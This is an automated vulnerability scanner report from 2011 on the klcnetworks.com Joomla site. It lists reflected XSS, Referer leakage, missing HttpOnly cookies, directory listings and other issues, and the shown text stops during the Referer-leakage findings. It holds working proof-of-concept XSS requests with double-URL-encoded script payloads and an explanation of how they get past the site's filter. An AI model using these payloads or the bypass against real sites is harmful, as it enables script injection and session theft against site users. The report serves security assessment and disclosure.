klcnetworks.com, XSS, Cross Site Scripting, CWE-79, CAPEC-86

XSS in klcnetworks.com | Vulnerability Crawler Report

Report generated by CloudScan Vulnerability Crawler at Wed Jan 05 07:32:36 CST 2011.



Contents

Loading

1. Cross-site scripting (reflected)

1.1. http://www.klcnetworks.com/index.php [name of an arbitrarily supplied request parameter]

1.2. http://www.klcnetworks.com/index.php/index.php [name of an arbitrarily supplied request parameter]

1.3. http://www.services.klcnetworks.com/index.php [name of an arbitrarily supplied request parameter]

1.4. http://www.services.klcnetworks.com/index.php [name of an arbitrarily supplied request parameter]

2. Cross-domain Referer leakage

2.1. http://www.klcnetworks.com/

2.2. http://www.klcnetworks.com/index.php

2.3. http://www.klcnetworks.com/index.php

2.4. http://www.klcnetworks.com/index.php

2.5. http://www.klcnetworks.com/index.php/index.php

2.6. http://www.services.klcnetworks.com/index.php

2.7. http://www.services.klcnetworks.com/index.php

2.8. http://www.services.klcnetworks.com/index.php

2.9. http://www.services.klcnetworks.com/index.php

2.10. http://www.services.klcnetworks.com/index.php

2.11. http://www.services.klcnetworks.com/index.php

2.12. http://www.services.klcnetworks.com/index.php

2.13. http://www.services.klcnetworks.com/index.php

2.14. http://www.services.klcnetworks.com/index.php

3. Cookie without HttpOnly flag set

3.1. http://www.klcnetworks.com/

3.2. http://www.klcnetworks.com/index.php

3.3. http://www.services.klcnetworks.com/index.php

4. Directory listing

4.1. http://www.klcnetworks.com/templates/ja_purity/images/header/

4.2. http://www.klcnetworks.com/templates/ja_purity/js/

5. Email addresses disclosed

5.1. http://www.klcnetworks.com/index.php

5.2. http://www.klcnetworks.com/index.php/index.php

5.3. http://www.services.klcnetworks.com/index.php

6. HTML does not specify charset

6.1. http://www.klcnetworks.com/components/

6.2. http://www.klcnetworks.com/components/com_poll/

6.3. http://www.klcnetworks.com/components/com_poll/assets/

6.4. http://www.klcnetworks.com/images/

6.5. http://www.klcnetworks.com/images/M_images/

6.6. http://www.klcnetworks.com/images/stories/

6.7. http://www.klcnetworks.com/images/stories/klc_images/

6.8. http://www.klcnetworks.com/media/

6.9. http://www.klcnetworks.com/media/system/

6.10. http://www.klcnetworks.com/media/system/js/

6.11. http://www.klcnetworks.com/templates/

6.12. http://www.klcnetworks.com/templates/ja_purity/

6.13. http://www.klcnetworks.com/templates/ja_purity/css/

6.14. http://www.klcnetworks.com/templates/ja_purity/images/

6.15. http://www.klcnetworks.com/templates/ja_purity/styles/

6.16. http://www.klcnetworks.com/templates/ja_purity/styles/background/

6.17. http://www.klcnetworks.com/templates/ja_purity/styles/background/purewhite/

6.18. http://www.klcnetworks.com/templates/ja_purity/styles/elements/

6.19. http://www.klcnetworks.com/templates/ja_purity/styles/elements/black/

6.20. http://www.klcnetworks.com/templates/ja_purity/styles/header/

6.21. http://www.klcnetworks.com/templates/ja_purity/styles/header/green/

6.22. http://www.klcnetworks.com/templates/system/

6.23. http://www.klcnetworks.com/templates/system/css/

7. Content type is not specified



1. Cross-site scripting (reflected)  next
There are 4 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.klcnetworks.com/index.php [name of an arbitrarily supplied request parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.klcnetworks.com
Path:   /index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e1b0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9307deac1e0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8e1b0"><script>alert(1)</script>9307deac1e0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /index.php?option=com_contact&view=category&catid=12&Itemid=60&8e1b0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9307deac1e0=1 HTTP/1.1
Host: www.klcnetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 75463e7328b8eda0e9080729819d87e5=10qp7a03ictp600m7krtd0h6m3; ja_purity_tpl=ja_purity;

Response

HTTP/1.1 200 OK
Date: Wed, 05 Jan 2011 02:52:15 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Wed, 05 Jan 2011 02:52:15 GMT
MS-Author-Via: DAV
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17370


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...
<link href="/index.php?option=com_contact&amp;view=category&amp;catid=12&amp;Itemid=60&amp;8e1b0"><script>alert(1)</script>9307deac1e0=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

1.2. http://www.klcnetworks.com/index.php/index.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.klcnetworks.com
Path:   /index.php/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 349ea%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7447c8341c7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 349ea"><script>alert(1)</script>7447c8341c7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /index.php/index.php?option=com_contact&view=category&catid=12&Itemid=60&349ea%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7447c8341c7=1 HTTP/1.1
Host: www.klcnetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 75463e7328b8eda0e9080729819d87e5=10qp7a03ictp600m7krtd0h6m3; ja_purity_tpl=ja_purity;

Response

HTTP/1.1 200 OK
Date: Wed, 05 Jan 2011 03:44:20 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Wed, 05 Jan 2011 03:44:21 GMT
MS-Author-Via: DAV
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17840


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...
<link href="/index.php/index.php?option=com_contact&amp;view=category&amp;catid=12&amp;Itemid=60&amp;349ea"><script>alert(1)</script>7447c8341c7=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

1.3. http://www.services.klcnetworks.com/index.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.services.klcnetworks.com
Path:   /index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee786%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eabfb22f89d0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ee786"><script>alert(1)</script>abfb22f89d0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /index.php?option=com_content&view=category&id=40&Itemid=59&ee786%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eabfb22f89d0=1 HTTP/1.1
Host: www.services.klcnetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 75463e7328b8eda0e9080729819d87e5=mo2ai0p1o8b4eghpl6epgdoa62; ja_purity_tpl=ja_purity;

Response

HTTP/1.1 200 OK
Date: Wed, 05 Jan 2011 03:24:48 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Wed, 05 Jan 2011 03:24:48 GMT
Vary: Accept-Encoding
Content-Length: 13160
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...
<link href="/index.php?option=com_content&amp;view=category&amp;id=40&amp;Itemid=59&amp;ee786"><script>alert(1)</script>abfb22f89d0=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

1.4. http://www.services.klcnetworks.com/index.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.services.klcnetworks.com
Path:   /index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d3a7f%253ca%253e10d8f43a22f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d3a7f<a>10d8f43a22f in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /index.php?option=com_content&view=category&id=39&Itemid=59&format=feed&type=atom&d3a7f%253ca%253e10d8f43a22f=1 HTTP/1.1
Host: www.services.klcnetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 75463e7328b8eda0e9080729819d87e5=mo2ai0p1o8b4eghpl6epgdoa62; ja_purity_tpl=ja_purity;

Response

HTTP/1.1 200 OK
Date: Wed, 05 Jan 2011 03:24:42 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Wed, 05 Jan 2011 03:24:42 GMT
Connection: close
Content-Type: application/atom+xml; charset=utf-8
Content-Length: 100138

<?xml version="1.0" encoding="utf-8"?>
<!-- generator="Joomla! 1.5 - Open Source Content Management" -->
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en-gb">
   <title type="text">KLC Seaport-e
...[SNIP]...
<link rel="self" type="application/atom+xml" href="http://www.services.klcnetworks.com/index.php?option=com_content&amp;view=category&amp;id=39&amp;Itemid=59&amp;format=feed&amp;type=atom&amp;d3a7f<a>10d8f43a22f=1" />
...[SNIP]...

2. Cross-domain Referer leakage  previous  next
There are 14 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


2.1. http://www.klcnetworks.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.klcnetworks.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000002)%3C/script%3E HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.klcnetworks.com
Cookie: 75463e7328b8eda0e9080729819d87e5=92mjsg59tguve95uspfctqquq5; ja_purity_tpl=ja_purity
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 05 Jan 2011 02:57:59 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Wed, 05 Jan 2011 02:57:59 GMT
MS-Author-Via: DAV
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 18175


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...
</a>
<a href="http://jigsaw.w3.org/css-validator/check/referer" target="_blank" title="Our site is valid CSS" style="text-decoration: none;">
       <img src="http://www.klcnetworks.com/templates/ja_purity/images/but-css.gif" border="none" alt="Our site is valid CSS" />
...[SNIP]...
</a>
       <a href="http://validator.w3.org/check/referer" target="_blank" title="Our site is valid XHTML 1.0 Transitional" style="text-decoration: none;">
       <img src="http://www.klcnetworks.com/templates/ja_purity/images/but-xhtml10.gif" border="none" alt="Our site is valid XHTML 1.0 Transitional" />
...[SNIP]...

2.2. http://www.klcnetworks.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.klcnetworks.com
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.php?option=com_content&view=article&id=49&Itemid=55 HTTP/1.1
Referer: http://www.klcnetworks.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.klcnetworks.com
Cookie: 75463e7328b8eda0e9080729819d87e5=92mjsg59tguve95uspfctqquq5; ja_purity_tpl=ja_purity
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 05 Jan 2011 02:57:36 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Wed, 05 Jan 2011 02:57:36 GMT
MS-Author-Via: DAV
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 12842


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...
</div>
<a href="http://maps.google.com/maps?f=q&amp;source=s_q&amp;hl=en&amp;geocode=&amp;q=590+Herndon+Parkway,+Herndon,+VA&amp;sll=37.0625,-95.677068&amp;sspn=44.744674,94.482422&amp;ie=UTF8&amp;hq=&amp;hnear=590+Herndon+Pkwy,+Herndon,+Fairfax,+Virginia+20170&amp;t=h&amp;z=16" target="_blank" title="KLC Location &amp; Direction">Map</a>
...[SNIP]...
<div class="ja-cert">
       
<a href="http://jigsaw.w3.org/css-validator/check/referer" target="_blank" title="Our site is valid CSS" style="text-decoration: none;">
       <img src="http://www.klcnetworks.com/templates/ja_purity/images/but-css.gif" border="none" alt="Our site is valid CSS" />
...[SNIP]...
</a>
       <a href="http://validator.w3.org/check/referer" target="_blank" title="Our site is valid XHTML 1.0 Transitional" style="text-decoration: none;">
       <img src="http://www.klcnetworks.com/templates/ja_purity/images/but-xhtml10.gif" border="none" alt="Our site is valid XHTML 1.0 Transitional" />
...[SNIP]...

2.3. http://www.klcnetworks.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.klcnetworks.com
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.php?option=com_content&view=article&id=50&Itemid=56 HTTP/1.1
Referer: http://www.klcnetworks.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.klcnetworks.com
Cookie: 75463e7328b8eda0e9080729819d87e5=92mjsg59tguve95uspfctqquq5; ja_purity_tpl=ja_purity
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 05 Jan 2011 02:57:36 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Wed, 05 Jan 2011 02:57:36 GMT
MS-Author-Via: DAV
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 53141


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...
<span style="font-size: 8.5pt; "><a href="https://www.gsaadvantage.gov/" style="color: #333333; text-decoration: underline; "><span style="font-family: Arial, sans-serif; ">
...[SNIP]...
<span style="font-size: 8.5pt; "><a href="https://orca.bpn.gov/" style="color: #333333; text-decoration: underline; "><span style="font-family: Arial, sans-serif; ">
...[SNIP]...
<span style="font-size: 8.5pt; "><a href="https://www.bpn.gov/CCRSearch" style="color: #333333; text-decoration: underline; "><span style="font-family: Arial, sans-serif; ">
...[SNIP]...
<div class="ja-cert">
       
<a href="http://jigsaw.w3.org/css-validator/check/referer" target="_blank" title="Our site is valid CSS" style="text-decoration: none;">
       <img src="http://www.klcnetworks.com/templates/ja_purity/images/but-css.gif" border="none" alt="Our site is valid CSS" />
...[SNIP]...
</a>
       <a href="http://validator.w3.org/check/referer" target="_blank" title="Our site is valid XHTML 1.0 Transitional" style="text-decoration: none;">
       <img src="http://www.klcnetworks.com/templates/ja_purity/images/but-xhtml10.gif" border="none" alt="Our site is valid XHTML 1.0 Transitional" />
...[SNIP]...

2.4. http://www.klcnetworks.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.klcnetworks.com
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.php?option=com_content&view=article&id=48&Itemid=54 HTTP/1.1
Referer: http://www.klcnetworks.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.klcnetworks.com
Cookie: 75463e7328b8eda0e9080729819d87e5=92mjsg59tguve95uspfctqquq5; ja_purity_tpl=ja_purity
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 05 Jan 2011 02:57:36 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Wed, 05 Jan 2011 02:57:36 GMT
MS-Author-Via: DAV
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 17482


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...
</strong> is registered in CCR,..<a href="http://www.ccr.gov/" target="_blank" title="CCR" style="color: #333333; text-decoration: underline;">www.ccr.gov</a>, with online certifications and representations in ORCA, i.e...<a href="http://www.orca.gov/" target="_blank" title="ORCA" style="color: #333333; text-decoration: underline;">www.orca.gov</a>
...[SNIP]...
<span style="color: #000000; font-family: Helvetica; line-height: normal; font-size: medium;"><a href="https://www.gsaadvantage.gov/ref_text/GS35F0005P/0GL36A.20KSJF_GS-35F-0005P_GS35F0005PFX75.PDF" style="color: #333333; text-decoration: underline;"><span style="font-size: small;">
...[SNIP]...
<div class="ja-cert">
       
<a href="http://jigsaw.w3.org/css-validator/check/referer" target="_blank" title="Our site is valid CSS" style="text-decoration: none;">
       <img src="http://www.klcnetworks.com/templates/ja_purity/images/but-css.gif" border="none" alt="Our site is valid CSS" />
...[SNIP]...
</a>
       <a href="http://validator.w3.org/check/referer" target="_blank" title="Our site is valid XHTML 1.0 Transitional" style="text-decoration: none;">
       <img src="http://www.klcnetworks.com/templates/ja_purity/images/but-xhtml10.gif" border="none" alt="Our site is valid XHTML 1.0 Transitional" />
...[SNIP]...

2.5. http://www.klcnetworks.com/index.php/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.klcnetworks.com
Path:   /index.php/index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.php/index.php?option=com_content&view=article&id=51&Itemid=58 HTTP/1.1
Host: www.klcnetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 75463e7328b8eda0e9080729819d87e5=10qp7a03ictp600m7krtd0h6m3; ja_purity_tpl=ja_purity;

Response

HTTP/1.1 200 OK
Date: Wed, 05 Jan 2011 03:43:32 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Wed, 05 Jan 2011 03:43:32 GMT
MS-Author-Via: DAV
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18417


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...
<div class="ja-cert">
       
<a href="http://jigsaw.w3.org/css-validator/check/referer" target="_blank" title="Our site is valid CSS" style="text-decoration: none;">
       <img src="http://www.klcnetworks.com/index.php/templates/ja_purity/images/but-css.gif" border="none" alt="Our site is valid CSS" />
...[SNIP]...
</a>
       <a href="http://validator.w3.org/check/referer" target="_blank" title="Our site is valid XHTML 1.0 Transitional" style="text-decoration: none;">
       <img src="http://www.klcnetworks.com/index.php/templates/ja_purity/images/but-xhtml10.gif" border="none" alt="Our site is valid XHTML 1.0 Transitional" />
...[SNIP]...

2.6. http://www.services.klcnetworks.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.services.klcnetworks.com
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.php?option=com_content&view=article&id=50&Itemid=56 HTTP/1.1
Host: www.services.klcnetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 75463e7328b8eda0e9080729819d87e5=mo2ai0p1o8b4eghpl6epgdoa62; ja_purity_tpl=ja_purity;

Response

HTTP/1.1 200 OK
Date: Wed, 05 Jan 2011 03:25:36 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Wed, 05 Jan 2011 03:25:36 GMT
Vary: Accept-Encoding
Content-Length: 52675
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...
<span style="font-size: 8.5pt; "><a href="https://www.gsaadvantage.gov/" style="color: #333333; text-decoration: underline; "><span style="font-family: Arial, sans-serif; ">
...[SNIP]...
<span style="font-size: 8.5pt; "><a href="https://orca.bpn.gov/" style="color: #333333; text-decoration: underline; "><span style="font-family: Arial, sans-serif; ">
...[SNIP]...
<span style="font-size: 8.5pt; "><a href="https://www.bpn.gov/CCRSearch" style="color: #333333; text-decoration: underline; "><span style="font-family: Arial, sans-serif; ">
...[SNIP]...
<div class="ja-cert">
       
<a href="http://jigsaw.w3.org/css-validator/check/referer" target="_blank" title="Our site is valid CSS" style="text-decoration: none;">
       <img src="http://www.services.klcnetworks.com/templates/ja_purity/images/but-css.gif" border="none" alt="Our site is valid CSS" />
...[SNIP]...
</a>
       <a href="http://validator.w3.org/check/referer" target="_blank" title="Our site is valid XHTML 1.0 Transitional" style="text-decoration: none;">
       <img src="http://www.services.klcnetworks.com/templates/ja_purity/images/but-xhtml10.gif" border="none" alt="Our site is valid XHTML 1.0 Transitional" />
...[SNIP]...

2.7. http://www.services.klcnetworks.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.services.klcnetworks.com
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.php?option=com_content&view=article&id=58:klc-article-dax&catid=39:klc-seaport-partner&Itemid=59 HTTP/1.1
Host: www.services.klcnetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 75463e7328b8eda0e9080729819d87e5=mo2ai0p1o8b4eghpl6epgdoa62; ja_purity_tpl=ja_purity;

Response

HTTP/1.1 200 OK
Date: Wed, 05 Jan 2011 03:25:15 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Wed, 05 Jan 2011 03:25:15 GMT
Vary: Accept-Encoding
Content-Length: 14842
Connection: close
